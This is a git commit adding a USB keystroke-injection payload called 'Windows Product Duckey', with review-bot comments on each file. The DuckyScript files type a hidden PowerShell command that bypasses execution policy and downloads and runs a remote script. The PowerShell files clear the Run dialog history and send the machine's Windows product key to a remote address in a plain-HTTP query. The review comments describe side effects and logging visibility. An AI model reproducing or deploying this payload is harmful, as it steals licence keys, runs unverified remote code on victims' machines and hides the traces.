added payload Windows Product Duckey

pull/237/head
Julien Morice 2023-02-24 18:15:17 +01:00 committed by GitHub
parent 05f5b9c401
commit 3378957961
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 45 additions and 0 deletions


@ -0,0 +1,4 @@
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit
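Review bot: The only comment in this file covers the address placeholder, so nothing records that the line also deletes every value under `RunMRU` and puts the OEM product key into the `duckey` query parameter of a plain-HTTP GET. I would add `# Clears the Run dialog history (RunMRU), then sends the OEM product key in the "duckey" query parameter over unencrypted HTTP.` above it. Because the key travels in the URL, any proxy, web-server access log or packet capture on the path retains it, and that parameter name is the most direct thing for a defender to search for. The ten-line file at the end of this commit carries the same statements with comments; keeping a single copy would stop the two from drifting apart.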


@ -0,0 +1,14 @@
REM Title: Windows Product Duckey
REM Author: Who-Is-Julien
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
REM Target: Windows 10, 11
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
DELAY 500
ENTER
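Review bot: The REM header states the goal but not what the typed command does on the host: the `STRING` line starts a hidden PowerShell with `-Exec Bypass`, fetches `/.ps1` over plain HTTP and hands the response to `invoke-expression`, so whatever answers on that address is executed without any integrity check. I would add `REM Side effects: runs a remotely fetched script (plain HTTP, unverified); the script in this commit also clears the Run dialog history.` below the Description line. It is also worth documenting for the defending side of an exercise that the command line is visible to process-creation auditing and the fetched body to PowerShell script block logging (Event ID 4104). The same header gap is in the DEFINE variant in the next file section.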


@ -0,0 +1,17 @@
REM Title: Windows Product Duckey
REM Author: Who-Is-Julien
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
REM Target: Windows 10, 11
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
STRING REMOTE_IP_ADDRESS
STRING /.ps1; invoke-expression $pl
DELAY 500
ENTER
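Review bot: The REM line directly above `DEFINE` still says to replace `REMOTE_IP_ADDRESS`, but in this variant the address is set by `DEFINE REMOTE_IP_ADDRESS 192.168.1.10`, so the instruction points at the wrong thing. I would reword it to `REM Set the DEFINE below to the address of the server hosting the script.` The committed value is a real private address, so an unedited copy contacts whichever host holds 192.168.1.10 on the local network and runs what it returns. A documentation-range value such as `192.0.2.1` would fail closed until the payload is deliberately configured.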


@ -0,0 +1,10 @@
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
#clear windows run dialog history
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
#retrieve and send the computer's original product key to a remote server
Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
Exit